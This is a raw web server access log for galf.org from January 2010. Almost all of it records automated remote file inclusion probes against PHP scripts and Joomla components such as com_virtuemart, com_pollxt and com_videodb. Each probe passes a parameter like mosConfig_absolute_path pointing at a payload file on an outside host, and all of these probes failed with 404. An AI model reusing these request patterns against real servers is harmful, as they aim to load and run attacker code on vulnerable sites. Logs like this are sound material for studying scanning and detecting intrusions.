61.47.7.71 - - [03/Jan/2010:19:58:57 -0800] "GET /logs/access_090713.log%20%20/send_reminders.php?includedir=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.7.71 - - [03/Jan/2010:19:58:57 -0800] "GET /send_reminders.php?includedir=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.7.71 - - [03/Jan/2010:19:58:57 -0800] "GET /logs/send_reminders.php?includedir=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.7.71 - - [03/Jan/2010:19:59:21 -0800] "GET /logs/access_091228.log%20%20/send_reminders.php?includedir=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.37.199.41 - - [03/Jan/2010:20:01:00 -0800] "GET /logs/access_090803.log%20%20/index.php?pg=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.37.199.41 - - [03/Jan/2010:20:01:00 -0800] "GET /logs/index.php?pg=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.37.199.41 - - [03/Jan/2010:20:01:00 -0800] "GET /index.php?pg=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.37.199.41 - - [03/Jan/2010:20:01:00 -0800] "GET /logs/index.php?pg=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.37.199.41 - - [03/Jan/2010:20:01:00 -0800] "GET /index.php?pg=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.37.199.41 - - [03/Jan/2010:20:01:00 -0800] "GET /logs/access_090803.log%20%20/index.php?pg=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.37.199.41 - - [03/Jan/2010:20:03:22 -0800] "GET /logs/access_090803.log/index.php?pg=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.37.199.41 - - [03/Jan/2010:20:03:30 -0800] "GET /logs/access_090803.log/index.php?pg=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.7.71 - - [03/Jan/2010:20:07:44 -0800] "GET /logs/access.log/send_reminders.php?includedir=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
61.47.7.71 - - [03/Jan/2010:20:07:44 -0800] "GET /send_reminders.php?includedir=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
61.47.7.71 - - [03/Jan/2010:20:07:44 -0800] "GET /logs/send_reminders.php?includedir=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
61.47.7.71 - - [03/Jan/2010:20:08:10 -0800] "GET /logs/access_091228.log/send_reminders.php?includedir=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.7.71 - - [03/Jan/2010:20:08:10 -0800] "GET /send_reminders.php?includedir=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
61.47.7.71 - - [03/Jan/2010:20:08:10 -0800] "GET /logs/access.log/send_reminders.php?includedir=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
61.47.7.71 - - [03/Jan/2010:20:08:10 -0800] "GET /logs/send_reminders.php?includedir=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
208.80.193.31 - - [03/Jan/2010:20:12:21 -0800] "GET /labia23portugues/index.htm HTTP/1.0" 404 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; YComp 5.0.0.0; YPC 3.2.0; (R1 1.5))" "www.galf.org"
67.195.37.161 - - [03/Jan/2010:20:15:45 -0800] "GET /cendoc/?N=A HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
64.151.247.1 - - [03/Jan/2010:20:16:30 -0800] "GET /logs/access_091207.log//web/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.151.247.1 - - [03/Jan/2010:20:16:30 -0800] "GET /web/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.151.247.1 - - [03/Jan/2010:20:16:30 -0800] "GET /logs//web/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.7.71 - - [03/Jan/2010:20:16:30 -0800] "GET /inc/header.php/step_one.php?server_inc=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.7.71 - - [03/Jan/2010:20:16:30 -0800] "GET /logs//inc/header.php/step_one.php?server_inc=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.7.71 - - [03/Jan/2010:20:16:30 -0800] "GET /logs/access_090629.log%20%20//inc/header.php/step_one.php?server_inc=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.151.247.1 - - [03/Jan/2010:20:16:36 -0800] "GET /logs/access_091207.log%20%20//web/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.151.247.1 - - [03/Jan/2010:20:16:36 -0800] "GET /logs//web/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.151.247.1 - - [03/Jan/2010:20:16:36 -0800] "GET /web/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.7.71 - - [03/Jan/2010:20:16:41 -0800] "GET /logs/access_090914.log%20%20//inc/header.php/step_one.php?server_inc=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.7.71 - - [03/Jan/2010:20:18:23 -0800] "GET /logs/access_090629.log//inc/header.php/step_one.php?server_inc=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.7.71 - - [03/Jan/2010:20:18:23 -0800] "GET /logs/access_090914.log//inc/header.php/step_one.php?server_inc=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.250.252.242 - - [03/Jan/2010:20:18:58 -0800] "GET /labia/ HTTP/1.1" 200 524 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.galf.org"
64.151.247.1 - - [03/Jan/2010:20:19:02 -0800] "GET /logs/access_091221.log%20%20//web/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.151.247.1 - - [03/Jan/2010:20:19:12 -0800] "GET /logs/access_091221.log//web/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.151.247.1 - - [03/Jan/2010:20:19:12 -0800] "GET /logs//web/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.151.247.1 - - [03/Jan/2010:20:19:12 -0800] "GET /logs/access_090810.log//web/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.151.247.1 - - [03/Jan/2010:20:19:12 -0800] "GET /web/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.7.71 - - [03/Jan/2010:20:20:12 -0800] "GET /logs/access_090914.log%20%20//inc/header.php/step_one.php?server_inc=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.7.71 - - [03/Jan/2010:20:21:08 -0800] "GET /logs/access_090629.log//inc/header.php/step_one.php?server_inc=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.7.71 - - [03/Jan/2010:20:21:08 -0800] "GET /logs/access_090914.log//inc/header.php/step_one.php?server_inc=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.151.247.1 - - [03/Jan/2010:20:21:31 -0800] "GET /logs/access_091221.log//web/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.151.247.1 - - [03/Jan/2010:20:21:31 -0800] "GET /logs//web/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.151.247.1 - - [03/Jan/2010:20:21:31 -0800] "GET /web/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.62.35.55 - - [03/Jan/2010:20:22:15 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.62.35.55 - - [03/Jan/2010:20:22:15 -0800] "GET /logs/access_091207.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.62.35.55 - - [03/Jan/2010:20:22:16 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.62.35.55 - - [03/Jan/2010:20:22:34 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.62.35.55 - - [03/Jan/2010:20:22:34 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.62.35.55 - - [03/Jan/2010:20:22:34 -0800] "GET /logs/access_091207.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.17.151 - - [03/Jan/2010:20:23:36 -0800] "GET /components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.17.151 - - [03/Jan/2010:20:23:36 -0800] "GET /logs/access_090907.log//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.17.151 - - [03/Jan/2010:20:23:36 -0800] "GET /logs//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.151.247.1 - - [03/Jan/2010:20:23:37 -0800] "GET /logs/access_091207.log//web/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.nahongku.com/zBoard/skin/daerew_45galleryGD//lag.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
64.151.247.1 - - [03/Jan/2010:20:23:37 -0800] "GET /web/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.nahongku.com/zBoard/skin/daerew_45galleryGD//lag.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
64.151.247.1 - - [03/Jan/2010:20:23:37 -0800] "GET /logs//web/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.nahongku.com/zBoard/skin/daerew_45galleryGD//lag.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
189.72.17.151 - - [03/Jan/2010:20:23:49 -0800] "GET /components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.17.151 - - [03/Jan/2010:20:23:49 -0800] "GET /logs//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.17.151 - - [03/Jan/2010:20:23:49 -0800] "GET /logs/access_090907.log//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.17.151 - - [03/Jan/2010:20:23:51 -0800] "GET /logs//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.17.151 - - [03/Jan/2010:20:23:51 -0800] "GET /components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.17.151 - - [03/Jan/2010:20:23:51 -0800] "GET /logs/access_090907.log%20%20//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.17.151 - - [03/Jan/2010:20:23:53 -0800] "GET /logs/access_090907.log%20%20//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.17.151 - - [03/Jan/2010:20:23:53 -0800] "GET /logs//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.17.151 - - [03/Jan/2010:20:23:59 -0800] "GET /components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.151.247.1 - - [03/Jan/2010:20:24:21 -0800] "GET /logs/access_091221.log//web/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.nahongku.com/zBoard/skin/daerew_45galleryGD//lag.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
189.72.17.151 - - [03/Jan/2010:20:25:18 -0800] "GET /components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.17.151 - - [03/Jan/2010:20:25:18 -0800] "GET /logs/access_090907.log//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.17.151 - - [03/Jan/2010:20:25:19 -0800] "GET /logs//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.17.151 - - [03/Jan/2010:20:25:25 -0800] "GET /logs//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.17.151 - - [03/Jan/2010:20:25:25 -0800] "GET /logs/access_090907.log//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.17.151 - - [03/Jan/2010:20:25:25 -0800] "GET /components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.17.151 - - [03/Jan/2010:20:26:20 -0800] "GET /logs/access_090525.log//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.151.247.1 - - [03/Jan/2010:20:26:30 -0800] "GET /logs/access_090622.log%20%20/phphtml.php?htmlclass_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.151.247.1 - - [03/Jan/2010:20:26:30 -0800] "GET /phphtml.php?htmlclass_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.151.247.1 - - [03/Jan/2010:20:26:30 -0800] "GET /logs/phphtml.php?htmlclass_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.151.247.1 - - [03/Jan/2010:20:26:49 -0800] "GET /logs/access_090629.log%20%20/phphtml.php?htmlclass_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
117.74.98.18 - - [03/Jan/2010:20:27:55 -0800] "GET /components/com_simpleboard/file_upload.php?sbp=http://www.surgicalline.com.br/images/x1.gif??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
117.74.98.18 - - [03/Jan/2010:20:27:55 -0800] "GET /logs//components/com_simpleboard/file_upload.php?sbp=http://www.surgicalline.com.br/images/x1.gif??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
117.74.98.18 - - [03/Jan/2010:20:27:55 -0800] "GET /logs/access.log%20%20//components/com_simpleboard/file_upload.php?sbp=http://www.surgicalline.com.br/images/x1.gif??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
211.62.35.55 - - [03/Jan/2010:20:28:41 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.62.35.55 - - [03/Jan/2010:20:28:42 -0800] "GET /logs/access_091221.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.62.35.55 - - [03/Jan/2010:20:28:42 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [03/Jan/2010:20:30:38 -0800] "GET /com_virtuemart/export.php?mosConfig.absolute.path=http://koalisi.org/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [03/Jan/2010:20:30:38 -0800] "GET /logs/access_091130.log//com_virtuemart/export.php?mosConfig.absolute.path=http://koalisi.org/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [03/Jan/2010:20:30:38 -0800] "GET /logs//com_virtuemart/export.php?mosConfig.absolute.path=http://koalisi.org/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [03/Jan/2010:20:30:43 -0800] "GET /logs/access_090706.log//com_virtuemart/export.php?mosConfig.absolute.path=http://koalisi.org/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [03/Jan/2010:20:30:47 -0800] "GET /com_virtuemart/export.php?mosConfig.absolute.path=http://koalisi.org/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [03/Jan/2010:20:30:47 -0800] "GET /logs//com_virtuemart/export.php?mosConfig.absolute.path=http://koalisi.org/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [03/Jan/2010:20:30:47 -0800] "GET /logs/access_091130.log//com_virtuemart/export.php?mosConfig.absolute.path=http://koalisi.org/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [03/Jan/2010:20:30:51 -0800] "GET /logs/access_091130.log//com_virtuemart/export.php?mosConfig.absolute.path=http://koalisi.org/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [03/Jan/2010:20:30:51 -0800] "GET /logs//com_virtuemart/export.php?mosConfig.absolute.path=http://koalisi.org/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [03/Jan/2010:20:30:51 -0800] "GET /com_virtuemart/export.php?mosConfig.absolute.path=http://koalisi.org/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [03/Jan/2010:20:30:55 -0800] "GET /logs/access_090706.log//com_virtuemart/export.php?mosConfig.absolute.path=http://koalisi.org/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [03/Jan/2010:20:30:59 -0800] "GET /logs/access_090706.log//com_virtuemart/export.php?mosConfig.absolute.path=http://koalisi.org/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
117.74.98.18 - - [03/Jan/2010:20:31:54 -0800] "GET /components/com_simpleboard/file_upload.php?sbp=http://www.surgicalline.com.br/images/x1.gif??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
117.74.98.18 - - [03/Jan/2010:20:31:56 -0800] "GET /logs/access.log//components/com_simpleboard/file_upload.php?sbp=http://www.surgicalline.com.br/images/x1.gif??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
117.74.98.18 - - [03/Jan/2010:20:31:56 -0800] "GET /logs//components/com_simpleboard/file_upload.php?sbp=http://www.surgicalline.com.br/images/x1.gif??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
67.19.116.18 - - [03/Jan/2010:20:31:58 -0800] "GET /logs//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come11/fx29id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.116.18 - - [03/Jan/2010:20:31:58 -0800] "GET /components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come11/fx29id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.116.18 - - [03/Jan/2010:20:31:58 -0800] "GET /logs/access_090817.log//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come11/fx29id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.116.18 - - [03/Jan/2010:20:32:05 -0800] "GET /logs/access_090817.log//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come11/fx29id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.116.18 - - [03/Jan/2010:20:32:05 -0800] "GET /components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come11/fx29id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.116.18 - - [03/Jan/2010:20:32:05 -0800] "GET /logs//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come11/fx29id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.116.18 - - [03/Jan/2010:20:32:08 -0800] "GET /components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come11/fx29id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.116.18 - - [03/Jan/2010:20:32:08 -0800] "GET /logs//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come11/fx29id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.116.18 - - [03/Jan/2010:20:32:08 -0800] "GET /logs/access_090921.log%20%20//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come11/fx29id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.116.18 - - [03/Jan/2010:20:32:10 -0800] "GET /components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come11/fx29id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.116.18 - - [03/Jan/2010:20:32:10 -0800] "GET /logs/access_090921.log//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come11/fx29id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.116.18 - - [03/Jan/2010:20:32:10 -0800] "GET /logs//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come11/fx29id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.116.18 - - [03/Jan/2010:20:32:13 -0800] "GET /components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come11/fx29id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.116.18 - - [03/Jan/2010:20:32:36 -0800] "GET /logs/access_091221.log//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come11/fx29id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.116.18 - - [03/Jan/2010:20:32:36 -0800] "GET /logs//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come11/fx29id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.116.18 - - [03/Jan/2010:20:32:36 -0800] "GET /logs/access_090921.log//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come11/fx29id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.7.71 - - [03/Jan/2010:20:32:37 -0800] "GET /logs/index.php?body=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.7.71 - - [03/Jan/2010:20:32:37 -0800] "GET /index.php?body=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.7.71 - - [03/Jan/2010:20:32:37 -0800] "GET /logs/access_090914.log/index.php?body=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.87.192.182 - - [03/Jan/2010:20:32:55 -0800] "GET /logs/access_090525.log/index.php?conteudo=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.87.192.182 - - [03/Jan/2010:20:32:55 -0800] "GET /logs/access_091214.log/index.php?conteudo=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.62.35.55 - - [03/Jan/2010:20:33:18 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.62.35.55 - - [03/Jan/2010:20:33:20 -0800] "GET /logs/access_091221.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
